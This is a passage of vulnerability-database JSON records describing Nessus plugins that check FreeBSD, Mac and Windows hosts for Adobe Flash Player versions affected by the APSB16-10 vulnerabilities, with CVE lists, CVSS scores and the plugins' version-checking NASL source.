audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Adobe Flash Player\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-13T14:32:55", "description": "Adobe reports :\n\nThese updates harden a mitigation against JIT spraying attacks that could be used to bypass memory layout randomization mitigations (CVE-2016-1006).\n\nThese updates resolve type confusion vulnerabilities that could lead to code execution (CVE-2016-1015, CVE-2016-1019).\n\nThese updates resolve use-after-free vulnerabilities that could lead to code execution (CVE-2016-1011, CVE-2016-1013, CVE-2016-1016, CVE-2016-1017, CVE-2016-1031).\n\nThese updates resolve memory corruption vulnerabilities that could lead to code execution (CVE-2016-1012, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, CVE-2016-1032, CVE-2016-1033).\n\nThese updates resolve a stack overflow vulnerability that could lead to code execution (CVE-2016-1018).\n\nThese updates resolve a 
security bypass vulnerability (CVE-2016-1030).\n\nThese updates resolve a vulnerability in the directory search path used to find resources that could lead to code execution (CVE-2016-1014).", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-06-20T00:00:00", "type": "nessus", "title": "FreeBSD : flash -- multiple vulnerabilities (07888b49-35c4-11e6-8e82-002590263bf5)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1006", "CVE-2016-1011", "CVE-2016-1012", "CVE-2016-1013", "CVE-2016-1014", "CVE-2016-1015", "CVE-2016-1016", "CVE-2016-1017", "CVE-2016-1018", "CVE-2016-1019", "CVE-2016-1020", "CVE-2016-1021", "CVE-2016-1022", "CVE-2016-1023", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1026", "CVE-2016-1027", "CVE-2016-1028", "CVE-2016-1029", "CVE-2016-1030", "CVE-2016-1031", "CVE-2016-1032", "CVE-2016-1033"], "modified": "2022-03-08T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:linux-c6-flashplugin", "p-cpe:/a:freebsd:freebsd:linux-c6_64-flashplugin", "p-cpe:/a:freebsd:freebsd:linux-f10-flashplugin", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_07888B4935C411E68E82002590263BF5.NASL", "href": "https://www.tenable.com/plugins/nessus/91696", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. 
Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91696);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2016-1006\",\n \"CVE-2016-1011\",\n \"CVE-2016-1012\",\n \"CVE-2016-1013\",\n \"CVE-2016-1014\",\n \"CVE-2016-1015\",\n \"CVE-2016-1016\",\n \"CVE-2016-1017\",\n \"CVE-2016-1018\",\n \"CVE-2016-1019\",\n \"CVE-2016-1020\",\n \"CVE-2016-1021\",\n \"CVE-2016-1022\",\n \"CVE-2016-1023\",\n \"CVE-2016-1024\",\n \"CVE-2016-1025\",\n \"CVE-2016-1026\",\n \"CVE-2016-1027\",\n \"CVE-2016-1028\",\n \"CVE-2016-1029\",\n \"CVE-2016-1030\",\n \"CVE-2016-1031\",\n \"CVE-2016-1032\",\n \"CVE-2016-1033\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"FreeBSD : flash -- multiple 
vulnerabilities (07888b49-35c4-11e6-8e82-002590263bf5)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Adobe reports :\n\nThese updates harden a mitigation against JIT spraying attacks that\ncould be used to bypass memory layout randomization mitigations\n(CVE-2016-1006).\n\nThese updates resolve type confusion vulnerabilities that could lead\nto code execution (CVE-2016-1015, CVE-2016-1019).\n\nThese updates resolve use-after-free vulnerabilities that could lead\nto code execution (CVE-2016-1011, CVE-2016-1013, CVE-2016-1016,\nCVE-2016-1017, CVE-2016-1031).\n\nThese updates resolve memory corruption vulnerabilities that could\nlead to code execution (CVE-2016-1012, CVE-2016-1020, CVE-2016-1021,\nCVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025,\nCVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029,\nCVE-2016-1032, CVE-2016-1033).\n\nThese updates resolve a stack overflow vulnerability that could lead\nto code execution (CVE-2016-1018).\n\nThese updates resolve a security bypass vulnerability (CVE-2016-1030).\n\nThese updates resolve a vulnerability in the directory search path\nused to find resources that could lead to code execution\n(CVE-2016-1014).\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-10.html\");\n # https://vuxml.freebsd.org/freebsd/07888b49-35c4-11e6-8e82-002590263bf5.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?feef2d98\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n 
script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/06/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-c6-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-c6_64-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-f10-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"linux-c6-flashplugin<11.2r202.616\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-c6_64-flashplugin<11.2r202.616\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-f10-flashplugin<11.2r202.616\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-11T16:06:55", "description": "The version of Adobe Flash Player installed on the remote Mac OS X host is prior or equal to version 21.0.0.197. It is, therefore, affected by multiple vulnerabilities :\n\n - An Address Space Layout Randomization (ASLR) bypass vulnerability exists that allows an attacker to predict memory offsets in the call stack. (CVE-2016-1006)\n\n - Multiple use-after-free errors exist that allow an attacker to execute arbitrary code. (CVE-2016-1011, CVE-2016-1013, CVE-2016-1016, CVE-2016-1017, CVE-2016-1031)\n\n - Multiple memory corruption issues exist that allow an attacker to execute arbitrary code. 
(CVE-2016-1012, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, CVE-2016-1032, CVE-2016-1033)\n\n - A directory search path vulnerability exists that allows an attacker to disclose sensitive resources.\n (CVE-2016-1014)\n\n - Multiple type confusion errors exist that allow an attacker to execute arbitrary code. (CVE-2016-1015, CVE-2016-1019)\n\n - An overflow condition exists that is triggered when handling JPEG-XR compressed image content. An attacker can exploit this to execute arbitrary code.\n (CVE-2016-1018)\n\n - An unspecified security bypass vulnerability exists.\n (CVE-2016-1030)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-04-08T00:00:00", "type": "nessus", "title": "Adobe Flash Player for Mac <= 21.0.0.197 Multiple Vulnerabilities (APSB16-10)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1006", "CVE-2016-1011", "CVE-2016-1012", "CVE-2016-1013", "CVE-2016-1014", "CVE-2016-1015", "CVE-2016-1016", "CVE-2016-1017", "CVE-2016-1018", "CVE-2016-1019", "CVE-2016-1020", "CVE-2016-1021", "CVE-2016-1022", "CVE-2016-1023", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1026", "CVE-2016-1027", "CVE-2016-1028", "CVE-2016-1029", "CVE-2016-1030", "CVE-2016-1031", "CVE-2016-1032", "CVE-2016-1033"], "modified": "2022-03-08T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "MACOSX_FLASH_PLAYER_APSB16-10.NASL", "href": "https://www.tenable.com/plugins/nessus/90426", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90426);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2016-1006\",\n \"CVE-2016-1011\",\n \"CVE-2016-1012\",\n \"CVE-2016-1013\",\n \"CVE-2016-1014\",\n 
\"CVE-2016-1015\",\n \"CVE-2016-1016\",\n \"CVE-2016-1017\",\n \"CVE-2016-1018\",\n \"CVE-2016-1019\",\n \"CVE-2016-1020\",\n \"CVE-2016-1021\",\n \"CVE-2016-1022\",\n \"CVE-2016-1023\",\n \"CVE-2016-1024\",\n \"CVE-2016-1025\",\n \"CVE-2016-1026\",\n \"CVE-2016-1027\",\n \"CVE-2016-1028\",\n \"CVE-2016-1029\",\n \"CVE-2016-1030\",\n \"CVE-2016-1031\",\n \"CVE-2016-1032\",\n \"CVE-2016-1033\"\n );\n script_bugtraq_id(\n 85856,\n 85926,\n 85927,\n 85928,\n 85930,\n 85931,\n 85932,\n 85933\n );\n script_xref(name:\"ZDI\", value:\"ZDI-16-225\");\n script_xref(name:\"ZDI\", value:\"ZDI-16-226\");\n script_xref(name:\"ZDI\", value:\"ZDI-16-227\");\n script_xref(name:\"ZDI\", value:\"ZDI-16-228\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"Adobe Flash Player for Mac <= 21.0.0.197 Multiple Vulnerabilities (APSB16-10)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Flash Player installed on the remote Mac OS X\nhost is prior or equal to version 21.0.0.197. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An Address Space Layout Randomization (ASLR) bypass\n vulnerability exists that allows an attacker to predict\n memory offsets in the call stack. (CVE-2016-1006)\n\n - Multiple use-after-free errors exist that allow an\n attacker to execute arbitrary code. (CVE-2016-1011,\n CVE-2016-1013, CVE-2016-1016, CVE-2016-1017,\n CVE-2016-1031)\n\n - Multiple memory corruption issues exist that allow an\n attacker to execute arbitrary code. 
(CVE-2016-1012,\n CVE-2016-1020, CVE-2016-1021, CVE-2016-1022,\n CVE-2016-1023, CVE-2016-1024, CVE-2016-1025,\n CVE-2016-1026, CVE-2016-1027, CVE-2016-1028,\n CVE-2016-1029, CVE-2016-1032, CVE-2016-1033)\n\n - A directory search path vulnerability exists that allows\n an attacker to disclose sensitive resources.\n (CVE-2016-1014)\n\n - Multiple type confusion errors exist that allow an\n attacker to execute arbitrary code. (CVE-2016-1015,\n CVE-2016-1019)\n\n - An overflow condition exists that is triggered when\n handling JPEG-XR compressed image content. An attacker\n can exploit this to execute arbitrary code.\n (CVE-2016-1018)\n\n - An unspecified security bypass vulnerability exists.\n (CVE-2016-1030)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-10.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 21.0.0.213 or later.\n\nAlternatively, Adobe has made version 18.0.0.343 available for those\ninstallations that cannot be upgraded to the latest version.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-1033\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/03/16\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/04/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_flash_player_installed.nasl\");\n script_require_keys(\"MacOSX/Flash_Player/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"MacOSX/Flash_Player/Version\");\npath = get_kb_item_or_exit(\"MacOSX/Flash_Player/Path\");\n\nif (version =~ \"^(19|2[01])\\.\")\n{\n cutoff_version = \"21.0.0.197\";\n fix = \"21.0.0.213\";\n}\nelse\n{\n cutoff_version = \"18.0.0.333\";\n fix = \"18.0.0.343\";\n}\n# we're checking for versions less than or equal to the cutoff!\nif (ver_compare(ver:version, fix:cutoff_version, strict:FALSE) <= 0)\n{\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_report_v4(severity:SECURITY_HOLE, port:0, extra:report);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Flash Player for Mac\", version, path);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-11T16:05:53", "description": "The version of Adobe Flash Player installed on the remote Windows host is prior or equal to version 21.0.0.197. It is, therefore, affected by multiple vulnerabilities :\n\n - An Address Space Layout Randomization (ASLR) bypass vulnerability exists that allows an attacker to predict memory offsets in the call stack. 
(CVE-2016-1006)\n\n - Multiple use-after-free errors exist that allow an attacker to execute arbitrary code. (CVE-2016-1011, CVE-2016-1013, CVE-2016-1016, CVE-2016-1017, CVE-2016-1031)\n\n - Multiple memory corruption issues exist that allow an attacker to execute arbitrary code. (CVE-2016-1012, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, CVE-2016-1032, CVE-2016-1033)\n\n - A directory search path vulnerability exists that allows an attacker to disclose sensitive resources.\n (CVE-2016-1014)\n\n - Multiple type confusion errors exist that allow an attacker to execute arbitrary code. (CVE-2016-1015, CVE-2016-1019)\n\n - An overflow condition exists that is triggered when handling JPEG-XR compressed image content. An attacker can exploit this to execute arbitrary code.\n (CVE-2016-1018)\n\n - An unspecified security bypass vulnerability exists.\n (CVE-2016-1030)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-04-08T00:00:00", "type": "nessus", "title": "Adobe Flash Player <= 21.0.0.197 Multiple Vulnerabilities (APSB16-10)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1006", "CVE-2016-1011", "CVE-2016-1012", "CVE-2016-1013", "CVE-2016-1014", "CVE-2016-1015", "CVE-2016-1016", "CVE-2016-1017", "CVE-2016-1018", "CVE-2016-1019", "CVE-2016-1020", "CVE-2016-1021", "CVE-2016-1022", "CVE-2016-1023", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1026", "CVE-2016-1027", "CVE-2016-1028", "CVE-2016-1029", "CVE-2016-1030", "CVE-2016-1031", "CVE-2016-1032", "CVE-2016-1033"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "FLASH_PLAYER_APSB16-10.NASL", "href": "https://www.tenable.com/plugins/nessus/90425", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif 
(description)\n{\n script_id(90425);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2016-1006\",\n \"CVE-2016-1011\",\n \"CVE-2016-1012\",\n \"CVE-2016-1013\",\n \"CVE-2016-1014\",\n \"CVE-2016-1015\",\n \"CVE-2016-1016\",\n \"CVE-2016-1017\",\n \"CVE-2016-1018\",\n \"CVE-2016-1019\",\n \"CVE-2016-1020\",\n \"CVE-2016-1021\",\n \"CVE-2016-1022\",\n \"CVE-2016-1023\",\n \"CVE-2016-1024\",\n \"CVE-2016-1025\",\n \"CVE-2016-1026\",\n \"CVE-2016-1027\",\n \"CVE-2016-1028\",\n \"CVE-2016-1029\",\n \"CVE-2016-1030\",\n \"CVE-2016-1031\",\n \"CVE-2016-1032\",\n \"CVE-2016-1033\"\n );\n script_bugtraq_id(\n 85856,\n 85926,\n 85927,\n 85928,\n 85930,\n 85931,\n 85932,\n 85933\n );\n script_xref(name:\"ZDI\", value:\"ZDI-16-225\");\n script_xref(name:\"ZDI\", value:\"ZDI-16-226\");\n script_xref(name:\"ZDI\", value:\"ZDI-16-227\");\n script_xref(name:\"ZDI\", value:\"ZDI-16-228\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"Adobe Flash Player <= 21.0.0.197 Multiple Vulnerabilities (APSB16-10)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Flash Player installed on the remote Windows host\nis prior or equal to version 21.0.0.197. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An Address Space Layout Randomization (ASLR) bypass\n vulnerability exists that allows an attacker to predict\n memory offsets in the call stack. (CVE-2016-1006)\n\n - Multiple use-after-free errors exist that allow an\n attacker to execute arbitrary code. (CVE-2016-1011,\n CVE-2016-1013, CVE-2016-1016, CVE-2016-1017,\n CVE-2016-1031)\n\n - Multiple memory corruption issues exist that allow an\n attacker to execute arbitrary code. 
(CVE-2016-1012,\n CVE-2016-1020, CVE-2016-1021, CVE-2016-1022,\n CVE-2016-1023, CVE-2016-1024, CVE-2016-1025,\n CVE-2016-1026, CVE-2016-1027, CVE-2016-1028,\n CVE-2016-1029, CVE-2016-1032, CVE-2016-1033)\n\n - A directory search path vulnerability exists that allows\n an attacker to disclose sensitive resources.\n (CVE-2016-1014)\n\n - Multiple type confusion errors exist that allow an\n attacker to execute arbitrary code. (CVE-2016-1015,\n CVE-2016-1019)\n\n - An overflow condition exists that is triggered when\n handling JPEG-XR compressed image content. An attacker\n can exploit this to execute arbitrary code.\n (CVE-2016-1018)\n\n - An unspecified security bypass vulnerability exists.\n (CVE-2016-1030)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-10.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 21.0.0.213 or later.\n\nAlternatively, Adobe has made version 18.0.0.343 available for those\ninstallations that cannot be upgraded to the latest version.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-1033\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/03/16\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/04/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"flash_player_installed.nasl\");\n script_require_keys(\"SMB/Flash_Player/installed\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Flash_Player/installed\");\n\n# Identify vulnerable versions.\ninfo = \"\";\nvariants = make_list(\n \"Plugin\",\n \"ActiveX\",\n \"Chrome\",\n \"Chrome_Pepper\"\n);\n\n# we're checking for versions less than *or equal to* the cutoff!\nforeach variant (variants)\n{\n vers = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/Version/*\");\n files = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/File/*\");\n\n if(isnull(vers) || isnull(files))\n continue;\n\n foreach key (keys(vers))\n {\n ver = vers[key];\n if(isnull(ver))\n continue;\n\n vuln = FALSE;\n\n # Chrome Flash <= 21.0.0.197\n if(variant == \"Chrome_Pepper\" &&\n ver_compare(ver:ver,fix:\"21.0.0.197\",strict:FALSE) <= 0\n ) vuln = TRUE;\n\n # <= 18.0.0.333\n if(variant != \"Chrome_Pepper\" &&\n ver_compare(ver:ver,fix:\"18.0.0.333\",strict:FALSE) <= 0\n ) vuln = TRUE;\n\n # 19 <= 21.0.0.197\n else if(variant != \"Chrome_Pepper\" && ver =~ \"^(?:19|[2-9]\\d)\\.\")\n {\n if (variant == \"ActiveX\" && ver_compare(ver:ver,fix:\"21.0.0.197\",strict:FALSE) <= 0)\n vuln = TRUE;\n else if (ver_compare(ver:ver,fix:\"21.0.0.197\",strict:FALSE) <= 0)\n vuln = TRUE;\n }\n\n if(vuln)\n {\n num = key 
- (\"SMB/Flash_Player/\"+variant+\"/Version/\");\n file = files[\"SMB/Flash_Player/\"+variant+\"/File/\"+num];\n if (variant == \"Plugin\")\n {\n info += '\\n Product : Browser Plugin (for Firefox / Netscape / Opera)';\n fix = \"21.0.0.213 / 18.0.0.343\";\n }\n else if (variant == \"ActiveX\")\n {\n info += '\\n Product : ActiveX control (for Internet Explorer)';\n fix = \"21.0.0.213 / 18.0.0.343\";\n }\n else if (\"Chrome\" >< variant)\n {\n info += '\\n Product : Browser Plugin (for Google Chrome)';\n if(variant == \"Chrome\")\n fix = \"Upgrade to a version of Google Chrome running Flash Player 21.0.0.213\";\n }\n info += '\\n Path : ' + file +\n '\\n Installed version : ' + ver;\n if (variant == \"Chrome_Pepper\")\n info += '\\n Fixed version : 21.0.0.213 (Chrome PepperFlash)';\n else if(!isnull(fix))\n info += '\\n Fixed version : '+fix;\n info += '\\n';\n }\n }\n}\n\nif (info)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n security_report_v4(port:port, extra:info, severity:SECURITY_HOLE);\n}\nelse\n{\n if (thorough_tests)\n exit(0, 'No vulnerable versions of Adobe Flash Player were found.');\n else\n exit(1, 'Google Chrome\\'s built-in Flash Player may not have been detected because the \\'Perform thorough tests\\' setting was not enabled.');\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-11T16:06:12", "description": "The remote Windows host is missing KB3154132. It is, therefore, affected by multiple vulnerabilities :\n\n - An Address Space Layout Randomization (ASLR) bypass vulnerability exists that allows an attacker to predict memory offsets in the call stack. (CVE-2016-1006)\n\n - Multiple use-after-free errors exist that allow an attacker to execute arbitrary code. (CVE-2016-1011, CVE-2016-1013, CVE-2016-1016, CVE-2016-1017, CVE-2016-1031)\n\n - Multiple memory corruption issues exist that allow an attacker to execute arbitrary code. 
(CVE-2016-1012, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, CVE-2016-1032, CVE-2016-1033)\n\n - A directory search path vulnerability exists that allows an attacker to disclose sensitive resources.\n (CVE-2016-1014)\n\n - Multiple type confusion errors exist that allow an attacker to execute arbitrary code. (CVE-2016-1015, CVE-2016-1019)\n\n - An overflow condition exists that is triggered when handling JPEG-XR compressed image content. An attacker can exploit this to execute arbitrary code.\n (CVE-2016-1018)\n\n - An unspecified security bypass vulnerability exists.\n (CVE-2016-1030)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-04-12T00:00:00", "type": "nessus", "title": "MS16-050: Security Update for Adobe Flash Player (3154132)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1006", "CVE-2016-1011", "CVE-2016-1012", 